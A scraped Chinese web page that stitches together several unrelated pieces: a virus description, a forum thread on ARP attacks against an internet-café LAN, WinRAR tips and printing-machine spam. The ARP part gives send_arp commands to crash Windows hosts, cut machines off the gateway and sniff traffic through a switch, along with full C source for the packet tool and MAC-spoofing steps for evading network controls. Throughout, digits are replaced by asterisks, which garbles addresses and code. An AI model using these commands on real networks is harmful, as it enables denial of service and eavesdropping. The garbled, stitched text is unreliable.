   长期以来,WIN*2.FunLove.*099病毒在我国感染率居高不下,屡杀不尽,寻求解决方案的电话和邮件不断。尤其是NT服务器感染该病毒后的清除一直存在问题。江民公司、赛门铁克等几大反病毒厂家纷纷推出了自己的一整套解决方案,声称困扰计算机用户两年之久的WIN*2.FunLove.*099病毒有望根除,但截止目前,该病毒并没有被赶净杀绝。

   WIN*2.FunLove.*099病毒是驻留内存的Win*2病毒,它感染本地和网络中的PE-EXE文件,属于一种易监测、难杀除的顽劣病毒。当染毒的文件被运行时,该病毒将在Windows\system目录下创建FLCSS.EXE文件,在其中只写入纯代码部分,并运行这个生成的文件。

   一旦在创建FLCSS.EXE文件的时候发生错误,病毒将从染毒的主机文件中运行传染模块。该传染模块被作为独立的线程在后台运行,主机程序在执行时几乎没有可察觉的延时。

   传染模块将扫描本地从 C: to Z:的所有驱动器,然后搜索网络资源,扫描网络中的子目录树并感染具有.OCX, .SCR or .EXE扩展名的PE文件,当感染一个文件时,该病毒将其代码写到文件的尾部并且添加启动程序(*字节长的代码)将控制权传递给病毒体。当被激活,病毒将首先恢复这*字节的代码然后运行它的主程序。并在机器间完全共享的文件中极为迅速地传播,致使计算机长期处于“病态”。

   网络时代的病毒常常是不可预见的,正如2001年7月涌现Sircam、*月泛滥"红色代码",9月是否新的计算机安全杀手又将横空出世尚不可知。时至今日,通过网络滋生和传播的病毒已达*0%以上,让人类从经济和精神上饱受打击,对病毒的防范,除了呼唤更好的单机版杀毒软件为个人用户筑起一道坚实的防护墙,除了期盼更安全的网络版防杀毒系统为企事业单位竖起牢固的盾牌,除了希望杀毒厂家能提供更优质及时的升级服务和技术支持外,其余能做的,只有牢记象与病毒征战了十余年的王江民那样的专家不断重复的几句话:一是要养成备份文件的习惯,二是及时升级杀毒软件以最大限度地减少损失,三是学会利用杀毒软件进行灾难恢复。

   与病毒抗争,永远都是:亡羊补牢犹为晚。

  防御局域网攻击

  我一个朋友的网吧最近遭受一种奇怪的攻击,他网吧一共有*0台机器,和另外*个网吧并在一个网段中,IP地址从192.1**.0.1~192.1**.0.2**,大家共用CS服务器和WEB及流媒体服务器,其中一台CS服务器和流媒体服务器在他网吧里。

  最近每晚和中午,他网吧客满的时候,就有人在网内对他网吧的IP段进行攻击。表现是大面积IP地址冲突,造成机器暂时停止网络响应,而且网络中的CS服务器和流媒体服务器马上停止响应。一般持续半小时以上,IP冲突的速度大约10秒一次。连续几天都是如此,造成他很大损失。

  我朋友求助于我,于是我先试验了一下,证明故意修改IP的方式是无法造成服务器失去响应的,于是我在他网吧两台机器上安装了一些监测软件,试图捕捉对方的攻击数据包,然后再取得对方的MAC地址来查找攻击来源。由于主要表现是IP冲突,所以我使用commview*专门捕捉所有的ARP协议包,结果在晚上对方攻击时果然发现出现了大量有规律的ARP广播包,那些包明显是某种软件生成的,MAC地址是随机伪造的,IP地址就是他网吧的系列IP,这种包和一般开机的包不同,是pass-thourgh包,机器收到后9*系统马上失去网络响应,只有等很长时间或者重起,2K系统也马上失去响应,必须点确定才能恢复,但是所有连接的用户都Time Out了。

  由于包里MAC地址是伪造的,所以我无法查到来源,于是我去网上查找了一些资料,证明这是一种ARP拒绝服务攻击,但是没找到任何有效防范办法,微软也没有相应的补丁。唯一的办法除非在网络中使用路由器屏蔽ARP,用硬件存储ARP列表,但是路由器不是一个小网吧可以承担的设备。当然如果划分网段,再用网关把他和大家隔开也可以,因为ARP只在一个网段传播,但是这样别人就无法共用他们的服务器,而且破坏者也可以到他网吧来继续破坏,这也是不行的。

  我又试用了各种防火墙软件,证明也无法拦住这样的攻击包,没有一个防火墙产品可以屏蔽非法的ARP包。使用天网2.*和金山网镖,甚至用断开网络选项都无法挡住攻击。

  我后来在网上找到了一个叫做“……”(为防止别有用心的人用来干坏事,我略去这个软件的名字,转贴者也就是本人注)的软件,果然可以达到这个效果,证明这样的攻击软件在网上是大量存在的,大家可以去google里搜索下载这个软件。

  我现在唯一能告诉他的办法就是遇到攻击就拔网线,各位高手,还有没有什么低廉方便的手段能解决这个问题啊,我朋友都急死了,再这样他的网吧就做不下去了。

  请大家帮帮忙!!谢谢:)

  分析:

  网上关于ARP的资料已经很多了,就不用我都说了。

  用某一位高手的话来说,“我们能做的事情很多,唯一受

  限制的是我们的创造力和想象力”。

  ARP也是如此。

  以下讨论的机子有

  一个要攻击的机子:10.*.*.17*

  硬件地址:*2:**:*C:9*:EE:2F

  我的机子: :10.*.*.*9

  硬件地址:*2:**:*C:9*:ED:C*

  网关: 10.*.0.*

  硬件地址:00:90:2*:*D:0C:F*

  一台交换机另一端口的机子:10.*.*.*

  硬件地址:*2:**:*C:9*:ED:F7

  一:用ARP破WINDOWS的屏保

  原理:利用IP冲突的级别比屏保高,当有冲突时,就会

  跳出屏保。

  关键:ARP包的数量适当。

  [root@sztcww tools]# ./send_arp 10.*.*.17* 00:90:2*:*D:0C:F* \

  10.*.*.17* *2:**:*C:9*:EE:2F *0

  二:用ARP导致IP冲突,死机

  原理:WINDOWS 9X,NT*在处理IP冲突时,处理不过来,导致死机。

  注: 对WINDOWS 2K,LINUX相当于flooding,只是比一般的FLOODING

  有效的多.对LINUX,明显系统被拖慢。

  [root@sztcww tools]# ./send_arp 10.*.*.17* 00:90:2*:*D:0C:F* \

  10.*.*.17* *2:**:*C:9*:EE:2F 999999999

  三:用ARP欺骗网关,可导致局域网的某台机子出不了网关。

  原理:用ARP应答包去刷新对应着要使之出不去的机子。

  [root@sztcww tools]# ./send_arp 10.*.*.17* *2:**:*C:9*:EE:22 \

  10.*.*.17* 00:90:2*:*D:0C:F* 1

  注意:如果单单如上的命令,大概只能有效几秒钟,网关机子里的ARP

  高速缓存会被被攻击的机子正确刷新,于是只要...

  四:用ARP欺骗交换机,可监听到交换机另一端的机子。

  可能需要修改一下send_arp.c,构造如下的数据包。

  ethhdr

  srchw:*2:**:*C:9*:ED:F7---dsthw:FF:FF:FF:FF:FF:FF proto:*0*H

  arphdr

  hwtype:1 protol:*00H hw_size:* pro_size:* op:1

  s_ha:*2:**:*C:9*:ED:F7 s_ip:10.*.*.*

  d_ha:00:00:00:00:00:00 d_ip:10.*.*.*

  然后就可以sniffer了。

  原理:

  交换机是具有记忆MAC地址功能的,它维护一张MAC地址和它的口号表

  所以你可以先来个ARP 欺骗,然后就可以监听了

  不过需要指出,欺骗以后,同一个MAC地址就有两个端口号

  yuange说,“这样其实就是一个竞争问题。”

  好象ARP 以后,对整个网络会有点影响,不过我不敢确定

  既然是竞争,所以监听也只能监听一部分,不象同一HUB下的监听。

  对被监听者会有影响,因为他掉了一部分数据。

  当然还有其他一些应用,需要其他技术的配合。

  以下是send_arp.c的源程序

  This program sends out one ARP packet with source/target IP

  and Ethernet hardware addresses suuplied by the user. It

  compiles and works on Linux and will probably work on any

  Unix that has SOCK_PACKET. volobuev@t1.chem.umn.edu

  #include netdb.h

  #include sys/socket.h

  #include sys/types.h

  #include stdio.h

  #include errno.h

  #include sys/ioctl.h

  #include net/if.h

  #include signal.h

  #include netinet/ip.h

  #include netinet/in.h

  #include string.h

  #include arpa/inet.h

  #include netinet/ip_icmp.h

  #include linux/if_ether.h

  #define ETH_HW_ADDR_LEN *

  #define IP_ADDR_LEN *

  #define ARP_FRAME_TYPE 0x0*0*

  #define ETHER_HW_TYPE 1

  #define IP_PROTO_TYPE 0x0*00

  #define OP_ARP_REQUEST 2

  #define OP_ARP_QUEST 1

  #define DEFAULT_DEVICE "eth0"

  char usage[] = {"send_arp: sends out custom ARP packet. yuri volobuev

  usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number"};

  struct arp_packet

  u_char targ_hw_addr[ETH_HW_ADDR_LEN];

  u_char src_hw_addr[ETH_HW_ADDR_LEN];

  u_short frame_type;

  u_short hw_type;

  u_short prot_type;

  u_char hw_addr_size;

  u_char prot_addr_size;

  u_short op;

  u_char sndr_hw_addr[ETH_HW_ADDR_LEN];

  u_char sndr_ip_addr[IP_ADDR_LEN];

  u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];

  u_char rcpt_ip_addr[IP_ADDR_LEN];

  u_char padding[1*];

  void die (char *);

  void get_ip_addr (struct in_addr *, char *);

  void get_hw_addr (char *, char *);

  int main (int argc, char * argv[])

  struct in_addr src_in_addr, targ_in_addr;

  struct arp_packet pkt;

  struct sockaddr sa;

  int sock;

  int j,number;

  if (argc != *)

  die(usage);

  sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_RARP));

  if (sock 0)

  perror("socket");

  exit(1);

  number=atoi(argv[*]);

  pkt.frame_type = htons(ARP_FRAME_TYPE);

  pkt.hw_type = htons(ETHER_HW_TYPE);

  pkt.prot_type = htons(IP_PROTO_TYPE);

  pkt.hw_addr_size = ETH_HW_ADDR_LEN;

  pkt.prot_addr_size = IP_ADDR_LEN;

  pkt.op = htons(OP_ARP_QUEST);

  get_hw_addr(pkt.targ_hw_addr, argv[*]);

  get_hw_addr(pkt.rcpt_hw_addr, argv[*]);

  get_hw_addr(pkt.src_hw_addr, argv[2]);

  get_hw_addr(pkt.sndr_hw_addr, argv[2]);

  get_ip_addr(src_in_addr, argv[1]

  get_ip_addr(targ_in_addr, argv[*]

  memcpy(pkt.sndr_ip_addr, src_in_addr, IP_ADDR_LEN);

  memcpy(pkt.rcpt_ip_addr, targ_in_addr, IP_ADDR_LEN);

  bzero(pkt.padding,1*);

  strcpy(sa.sa_data,DEFAULT_DEVICE);

  for (j=0;jnumber;j++)

  if (sendto(sock,pkt,sizeof(pkt),0,sa,sizeof(sa)) 0)

  perror("sendto");

  exit(1);

  exit(0);

  void die (char *str)

  fprintf(stderr,"%s\n",str);

  exit(1);

  void get_ip_addr (struct in_addr *in_addr, char *str)

  struct hostent *hostp;

  in_addr-s_addr = inet_addr(str);

  if(in_addr-s_addr == -1)

  if ((hostp = gethostbyname(str)))

  bcopy(hostp-h_addr, in_addr, hostp-h_length);

  else {

  fprintf(stderr, "send_arp: unknown host %s\n", str);

  exit(1);

  void get_hw_addr (char *buf, char *str)

  int i;

  char c, val;

  for(i = 0; i ETH_HW_ADDR_LEN; i++)

  if (!(c = tolower(*str++)))

  die("Invalid hardware address");

  if (isdigit?)

  val = c - '0';

  else if (c = 'a' c = 'f')

  val = c-'a'+10;

  else

  die("Invalid hardware address");

  *buf = val *;

  if (!(c = tolower(*str++)))

  die("Invalid hardware address");

  if (isdigit?)

  val = c - '0';

  else if (c = 'a' c = 'f')

  val = c-'a'+10;

  else

  die("Invalid hardware address");

  *buf++ |= val;

  if (*str == ':')

  str++;

  以下是我用軟件攔下的局域網終結者的記錄﹐看來這個軟件只是根據你在攻擊軟件里面輸入的IP列表的IP及MAC地址﹐然后產生一個假的MAC地址去﹐使正在使用的網絡發生異常﹐我也試著解決這個問題﹐但目前除了靜態ARP之外﹐沒有其他更好的辦法了﹐這是采用TCP/IP協議的必然了。

  但是作為網管﹐完全可以追蹤到搞破壞的人的電腦呀﹐然后把此人打成馬蜂窩﹐并送公安局﹐這種只會利用別人現在工具搞破壞的人最可誤了﹗有能力自己寫吧﹗

  下面作參考﹐但不要攻擊我呀﹐如果有錯誤﹐請大家指正﹐謝謝了﹗

  1**1 *9.****77 LOCAL REALTEEE1*19 SMB R tree disconnect FANLI 77**797.00E0*CEE1*19 IPX/XNS

  Frame: Base frame properties

  Frame: Time of capture = 2002/10/2* 1*:**:21.*1*

  Frame: Time delta from previous physical frame: 0 microseconds

  Frame: Frame number: 1**1

  Frame: Total frame length: 100 bytes

  Frame: Capture frame length: 100 bytes

  Frame: Frame data: Number of data bytes remaining = 100 (0x00**)

  ETHERNET: *02.* Length = 100

  ETHERNET: Destination address : 00E0*CEE1*19

  ETHERNET: .......0 = Individual address

  ETHERNET: ......0. = Universally administered address

  ETHERNET: Source address : 00E0*CF*B1*B

  ETHERNET: .......0 = No routing information present

  ETHERNET: ......0. = Universally administered address

  ETHERNET: Frame Length : 100 (0x00**)

  ETHERNET: Data Length : 0x00** (**)

  ETHERNET: Ethernet Data: Number of data bytes remaining = ** (0x00**)

  LLC: UI DSAP=0xE0 SSAP=0xE0 C

  LLC: DSAP = 0xE0 : INDIVIDUAL : Novell IPX/SPX

  LLC: SSAP = 0xE0: COMMAND : Novell IPX/SPX

  LLC: Frame Category: Unnumbered Frame

  LLC: Command = UI

  LLC: LLC Data: Number of data bytes remaining = ** (0x00**)

  IPX: NetBIOS Packet - 77**797.00E0*CF*B1*B.*** - 77**797.00E0*CEE1*19.*** - 0 Hops

  IPX: Checksum = ***** (0xFFFF)

  IPX: IDP Length = ** (0x**)

  IPX: Transport control = 0 (0x0)

  IPX: Packet type = IPX

  IPX: Destination Address Summary 77**797.00E0*CEE1*19.***

  IPX: Destination IPX Address = 077**797.00E0*CEE1*19

  IPX: Destination Net Number = 12*991*** (0x77**797)

  IPX: Destination Socket Number = NetBIOS

  IPX: Source Address Summary 77**797.00E0*CF*B1*B.***

  IPX: Source IPX Address = 077**797.00E0*CF*B1*B

  IPX: Source Net Number = 12*991*** (0x77**797)

  IPX: Source Socket Number = NetBIOS

  IPX: Data: Number of data bytes remaining = ** (0x00**)

  NBIPX: Session Data

  NBIPX: Connection control flag

  NBIPX: 0....... = Non system packet

  NBIPX: .0...... = No send acknowledge

  NBIPX: ..0..... = No Attention

  NBIPX: ...1.... = End Of Message

  NBIPX: ....0... = No resend

  NBIPX: Data stream type = Session Data

  NBIPX: Source connection ID = 10227 (0x27F*)

  NBIPX: Destination connection ID = * (0x*)

  NBIPX: Send sequence number = 119 (0x77)

  NBIPX: Total data length = ** (0x2*)

  NBIPX: Offset = 0 (0x0)

  NBIPX: Data length = ** (0x2*)

  NBIPX: Receive Sequence number = 122 (0x7A)

  NBIPX: Bytes received = 127 (0x7F)

  NBIPX: Data: Number of data bytes remaining = ** (0x002*)

  SMB: R tree disconnect

  SMB: NT status code = 0x0, Facility = System, Severity = Success, Code = (0) STATUS_WAIT_0

  SMB: NT Status Severity Code = Success

  SMB: NT Status Customer Code = 0 (0x0)

  SMB: NT Status Reserved Bit = 0 (0x0)

  SMB: NT Status Facility = System

  SMB: NT Status Code System Success = STATUS_WAIT_0

  SMB: Header: PID = 0xFEFF TID = 0x0*0* MID = 0x*E** UID = 0x**01

  SMB: Tree ID (TID) = 20*1 (0x*0*)

  SMB: Process ID (PID) = **279 (0xFEFF)

  SMB: User ID (UID) = 2**2* (0x**01)

  SMB: Multiplex ID (MID) = 2*19* (0x*E**)

  SMB: Flags Summary = 1*2 (0x9*)

  SMB: .......0 = Lock Read and Write Unlock not supported

  SMB: ......0. = Send No Ack not supported

  SMB: ....1... = Using caseless pathnames

  SMB: ...1.... = Canonicalized pathnames

  SMB: ..0..... = No Opportunistic lock

  SMB: .0...... = No Change Notify

  SMB: 1....... = Server response

  SMB: flags2 Summary = *1207 (0xC*07)

  SMB: ...............1 = Understands long filenames

  SMB: ..............1. = Understands extended attributes

  SMB: ...0............ = No DFS namespace

  SMB: ..0............. = No paging of IO

  SMB: .1.............. = Using NT status codes

  SMB: 1............... = Using UNICODE strings

  SMB: Unknown Flag2 bits = 20*2 (0x*0*)

  SMB: Command = C tree disconnect

  SMB: Word count = 0

  SMB: Byte count = 0

  00000: 00 E0 *C EE 1* 19 00 E0 *C F* B1 *B 00 ** E0 E0 .àL?...àL?±k.Vàà

  00010: 0* FF FF 00 ** 00 0* 07 7* *7 97 00 E0 *C EE 1* .??.S...s7—.àL?.

  00020: 19 0* ** 07 7* *7 97 00 E0 *C F* B1 *B 0* ** 10 ..U.s7—.àL?±k.U.

  000*0: 0* F* 27 0* 00 77 00 2* 00 00 00 2* 00 7A 00 7F .ó'..w.#...#.z.

  000*0: 00 FF ** *D *2 71 00 00 00 00 9* 07 C* 00 00 00 .?SMBq....?;.è...

  000*0: 00 00 00 00 00 00 00 00 00 0* 0* FF FE 01 ** ** ...........?t.h?;

  000*0: *E 00 00 00 ^...

  解决方法:

  方法一:

  网段A(192.1**.0.x) 通过------ 网关服务器(192.1**.0.1;192.1**.10.1) -----〉 和网段B(192.1**.10.x)通信。

  假设架设 CS服务器在 网段B 192.1**.10.** 机器上,

  现在 在 网关服务器上架着一个端口转发程序(有很多的自己找)

  比如定义 网关服务器的2701*端口 转发 指定 192.1**.0.10.** 的2701*端口

  现在在网段A(192.1**.0.x) 的玩家只要的 互联网游戏地址处加入 192.1**.0.1:2701* 就可以找到 192.1**.10.** 的CS服务器了

  个人认为比较好的 办法是 把网段分开 , 在网关服务器上做端口转发服务

  来达到 共享CS服务器等 功能,就可以解决了~

  方法二:

  捆绑MAC和IP地址 杜绝IP地址盗用现象

  到代理服务器端让网络管理员把您上网的静态IP地址与所记录计算机的网卡地址进行捆绑。具体命令是:

    ARP -s 192.1**.0.* 00-EO-*C-*C-0*-7*

    这样,就将您上网的静态IP地址192.1**.0.*与网卡地址为00-EO-*C-*C-0*-7*的计算机绑定在一起了,即使别人盗用您的IP地址192.1**.0.*也无法通过代理服务器上网。其中应注意的是此项命令仅在局域网中上网的代理服务器端有用,还要是静态IP地址,像一般的Modem拨号上网是动态IP地址就不起作用。接下来我们对各参数的功能作一些简单的介绍:

    ARP-s-d-a

    -s——将相应的IP地址与物理地址的捆绑。

    -d——删除所给出的IP地址与物理地址的捆绑。

    -a——通过查询Arp协议表来显示IP地址和对应物理地址情况。

  方法三:

  网络执法官这个软件相信大家都听说过了。功能不错,可以禁止局域网任意机器连接网络。这个功能对网管来说的确不错。不过如果这个软件落到那些卑鄙小人的手里---那后果就不堪设想了。轻则把你封了上不了网,重则可以导致整个局域网瘫痪。。

  废话不说了,切入正题吧。现在教大家两招轻松防范网络执法官!!

  NO.1

  首先呢,最稳妥的一个办法就是修改机器的MAC地址,只要把MAC地址改为别的,就可以欺骗过网络执法官,从而达到突破封锁的目的。下面是修改MAC地址的方法:

  linux环境下:

  需要用

  #ifconfig eth0 down

  先把网卡禁用

  再用ifconfig eth0 hw ether 12****7*90ab

  这样就可以改成功了

  要想永久改就这样

  在/etc/rc.d/rc.local里加上这三句(也可以在/etc/init.d/network里加下面三行)

  ifconfig eth0 down

  ifconfig eth0 hw ether 12****7*90ab

  ifconfig eth0 up

  另:

  在win2000中改MAC地址的方法:

  打开注册表编辑器,找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{*D**E972-E*2*-11CE-BFC1-0*002BE10*1*}子键,在该子键下的0000,0001,0002等分支中查找DriverDesc,在0000子键下天一个字符串项,命名为NetworkAddress,键值设为修改后的MAC地址,要求为连续的12个1*进制数,如12****7*90AB(注意位数要对!不能是000000000000,不能与别的机器重复)。然后在0000下的NDI\params中加一项名为NetworkAddress的子键,在该子键下添加名为defau

  lt的字符串,键值为修改后的MAC地址,与上面的数值相同。在NetworkAddress的主键下继续添加命名为ParamDesc的字符串,其作用是制定NetworkAddress主键的描述,其值可为“MAC 地址”,这样以后打开网络属性,双击相应的网卡会发现有一个高级设置,其下坐在“MAC地址”的选项,在此修改MAC地址就可以了,修改后需重启。

  Windows环境:

  用dos,*1*9的可以改,用realtek的pg*1*9.exe,比如 是*1*9c网卡,就改写*1*9c.cfg文件,第一行就是网卡mac,想怎么改就怎么改

  NO.2

  另外一种方法,我没有试,一种设想,有条件的朋友帮忙试一下。

  由于网络执法官的原理是通过ARP欺骗发给被攻击的电脑一个假的网关IP地址对应的MAC,使其找不到网关真正的MAC,那么我们可以自己修改IP-MAC的映射,使网络执法官ARP欺骗失效。具体做法如下:

  在还没有被封锁的时候进入CMD执行如下命令

  e:\ping 192.1**.9.1 (假设此地址位网关。)

  Pinging 192.1**.9.1 with *2 bytes of data:

  Reply from 192.1**.9.1: bytes=*2 time10ms TTL=**

  Reply from 192.1**.9.1: bytes=*2 time10ms TTL=**

  Reply from 192.1**.9.1: bytes=*2 time10ms TTL=**

  Reply from 192.1**.9.1: bytes=*2 time10ms TTL=**

  Ping statistics for 192.1**.9.1:

  Packets: Sent = *, Received = *, Lost = 0 (0% loss),

  Approximate round trip times in milli-seconds:

  Minimum = 0ms, Maximum = 0ms, Average = 0ms

  e:\arp -a

  Interface: 192.1**.9.1 on Interface 0x*00000*

  Internet Address Physical Address Type

  192.1**.9.1 00-0E-70-*2-f1-02 dynamic

  (上面的就是网关的MAC)

  然后作这样一个批处理文件保存起来。。注意!!!地址要换为你自己的网关的IP和MAC

  arp -s 192.1**.9.1 00-0E-70-*2-f1-02

  然后呢,在你被封锁的时候,就执行这个批处理吧。

  NO.*

  如果解除了网络执法官的封锁可不可以查到使用网络执法官的人究竟是谁呢?答案是可以!(感谢zva提供方法)利用arpkiller的sniffer杀手扫描整个局域网IP段查找处在“混杂”(监听)模式下的计算机,应该就是他了!!!(注意,扫描的时候自己也处在混杂模式,自己不能算哦)

  之后做什么呢?就不用我说了吧?哈哈,以毒攻毒,用网络执法官把她封了!

  附:

  用到的工具在此下载:

  网络执法官1.02注册版

021yin.com/downtrojan/lanlawman1.02.zip

  arpkiller:

  

  贴子来源:

021yin.com/cn

  原作者:小兔

  转贴和评论者:健全

  评论:

  防止这种攻击最好的办法就是MAC地址和IP地址绑定,也可以防止用黑白名单时盗用白名单的IP,对于一些单位的网络控制也有点用处。

  不会查MAC地址的初学者用 ipconfig/all 就可以显示了

  -- 作者: wjqmll

  -- 发布时间: 200*/01/0* 11:0*am

  ][分享]WinRAR九大不传密技

  WinRAR是大家平时用得最多的压缩软件,针对它的技巧文章也很多。不过,尽管如此,我们还是挖出了很多玩家没有找出的一些独门绝技。

    密技一:注意危险自解压程序

    相信使用WinRAR来捆绑木马的文章大家也见到了很多。在此,建议大家,收到可执行的附件文件时,先把它们保存起来。然后试着右击它,选择WinRAR菜单,如果其下“用WinRAR打开”命令可用●,则表明此程序是一个自解压程序。此时可以把该文件的扩展名由EXE改为RAR,双击后即可用WinRAR打开它,这样会安全许多。

   密技二:让WinRAR“专一”工作

    在编辑压缩包内文件时,千万不要关闭该压缩包窗口,否则无法保存对文件的修改。另外,如果在此时双击打开其他RAR压缩包,WinRAR可能会自动关闭你正在修改文件的压缩包,从而无法更新所做修改,所以建议你在WinRAR窗口中按下Ctrl+S键,取消“常规”标签下的“重复使用已存在的窗口”复选框。

    密技三:文件压缩大小我先知

    打开WinRAR窗口,选择要压缩的文件,单击工具栏上的“信息”按钮,在打开窗口中单击“估计”按钮,WinRAR会给出压缩率、压缩包大小和压缩这个文件需要的时间等数据,这对于你压缩比较大的文件或文件夹非常有用。如果你希望每次单击“信息”按钮,以后WinRAR自动对文件进行评估的话,还可以选中“自动开始”选项。

    密技四:快速更换驱动器

    按下Ctrl+D键,可在WinRAR窗口中出现机器上所有驱动器列表,用鼠标选择即可快速进入相应的驱动器。

    密技五:批量建立文件夹

    如果在工作中,经常要建立很多相同文件夹结构(如在备份数据时)。那可以把这个繁琐的工作让WinRAR完成:先在“资源管理器”中把多个文件夹结构建好(包括其下的子文件夹),再选中并右击这些文件夹,选择WinRAR→“添加到压缩文件”,在打开的设置窗口中选中“压缩选项”下的“创建自释放格式档案文件”前复选框,单击“确定”按钮。再把生成后的EXE文件改名为folders.exe。以后要在哪个文件夹下建立上述文件夹,只要把这个文件拷贝到那个文件夹下,再双击folders.exe,单击“安装”按钮即可。

    密技六:我的设置你别改

    启动“记事本”,在其中输入以下语句:

  Windows Registry Editor Version *.00

  [HKEY_LOCAL_MACHINE\SOFTWARE\WinRAR\Policy]

  "Menu"=dword:00000000

  "Settings"=dword:00000000

  把它保存为limitrar.reg文件,再双击并导入这个REG文件,把它导入注册表。启动WinRAR,你会发现菜单无法使用,而且按Ctrl+S键也无法调出“设置”和“选择工具栏按钮”窗口,相对安全多了

  小提示

  ★把以上语句中的00000000改为00000001,另存为unlim.reg。双击导入unlim.reg文件即可恢复菜单,并允许使用“设置”窗口。

  ★其中的Menu项设置为0/1,用来禁止/允许WinRAR 主菜单,而Settings项设置为0/1,用来禁止/允许“设置”和“选择工具栏按钮”对话框。

  ★如果你使用Windows 9x/Me,请把上面的Windows Registry Editor Version *.00改为REGEDIT *。

    密技七:快速解压RAR压缩包指定文件

    如果想解压RAR压缩包中指定文件,可在打开RAR文件后,选中“选项”→“文件列表”→“平面文件夹查看”。此RAR压缩包中的所有文件会都显示出来(包括在相应文件夹中的),此时只要像“资源管理器”中一样,单击相应按钮,如名称、大小、类型、修改时间、路径等,就能对RAR包中的所有文件进行排序,做到一目了然。按文件类型排序后,配合Ctrl或Shift键选中指定文件,用鼠标拖放到文件夹下即可快速解压。按下Ctrl+H键取消平面文件夹查看模式。

  小提示

    先把RAR包切换到平面文件夹查看模式,再单击“类型”按钮,该包中所有类型的文件就被放置在一起(如所有的.tmp文件),先选中第一个文件,按住Shift键不松开,再单击最后一个文件,选中相应文件,按下Del键即可删除掉RAR包中同一类型文件。

    密技八:批量转换压缩包

    如果你手头上有多种格式的压缩包,想把它们都转换为RAR包,那可以这样做:先把这些压缩包放到一个文件夹下,如C:\compress。在WinRAR中选中C:\compress文件夹。再单击“命令”→“转换压缩文件”,在打开的窗口中勾选“删除原来的压缩文件”复选框,单击“确定”按钮即可把它们转换成RAR压缩包●。通过此法,可以把ZIP、CAB、ARJ、ACE、TAR、BZ2 、UUE、GZ、LZH等压缩包转换成RAR格式。

    密技九:重要文件,别删

    在RAR压缩包中删除文件后,WinRAR会自动更新它,其中被删除的文件无法再找到(回收站中也没有)。因此,如果压缩包确实不再修改或比较重要,则请选中此压缩包(不要双击打开它),然后按Alt+L组合键,在打开的窗口中确认“禁止修改压缩文件”复选框被选中,单击“确定”按钮即可把此压缩包锁住,其中的文件便无法被修改或删除。

   此命令只支持RAR压缩文件,同时,在压缩文件时,设置窗口中也有一个“锁定压缩文件”复选框●,一旦选中,生成后的压缩包将无法再修改,它对于备份重要数据很有用。

  • 生产型理光数码印刷机一台多少钱的简单介绍

    生产型理光数码印刷机一台多少钱的简单介绍

    1、全自动印刷机可以用uv打印机生产型理光数码印刷机一台多少钱,目前大一点生产型理光数码印刷机一台多少钱的型号有*0*0价格2*万左右;uv打印机是一种高科技生产型理光数码印刷机一台多少钱的免制版全彩色数码印刷机生产型理光数码印刷机一...

    2023-04-09 4707 0

  • 惠普*
*
00数码印刷机吉印通
的简单介绍

    惠普* * 00数码印刷机吉印通 的简单介绍

    颜色稳定性很好惠普5500数码印刷机马可波罗,色差也很小Indigo生产出来惠普5500数码印刷机马可波罗的印刷品颜色稳定性很好惠普5500数码印刷机马可波罗,色差也很小惠普5500数码印刷机马可波罗,很接近印刷品,机器很耐用,能适应长时间...

    2023-03-19 3233 0

  • 高速数码印刷的简单介绍

    高速数码印刷的简单介绍

      关注高速数码印刷我哟  重磅新闻201*华南国际瓦楞展第一天圆满结束啦共迎来1***1名海内外观众高速数码印刷,中国国际彩盒展共迎来9770名海内外观众高速数码印刷,中国包装容器展共迎来2*07名海内外观众今天瓦小编为大家带来...

    2023-03-02 4528 0

  • 数码印刷产品名称的简单介绍

    数码印刷产品名称的简单介绍

    1数码印刷机彩色数码印刷机突破了数码印刷技术瓶颈数码印刷产品名称,又名数码印刷机,万能平板打印机,平板打印机等实现了真正意义上数码印刷产品名称的一张起印无须制版面全彩图像一次完成极低的印刷成本及高质量的印刷效果比传统印刷系统经济方便。可以...

    2023-02-25 3030 0

  • 包含上海服装手提袋数码快印的词条

    包含上海服装手提袋数码快印的词条

    021yin.com/

    2023-02-23 2807 0

  • 包含彩印pvc数码印刷机的词条

    包含彩印pvc数码印刷机的词条

    您好彩印pvc数码印刷机,印刷机分为传统印刷机和数码印刷机就数码印刷机来说,其实原理和打印机没什么区别,只不过“打印机”这个词常备人们用来表示几百几千元那种桌面式彩印pvc数码印刷机的家用打印机而比较专业彩印pvc数码印刷机的数码印刷机则是...

    2023-02-16 2448 0

本文暂时没有评论,来添加一个吧(●'◡'●)

取消回复欢迎 发表评论: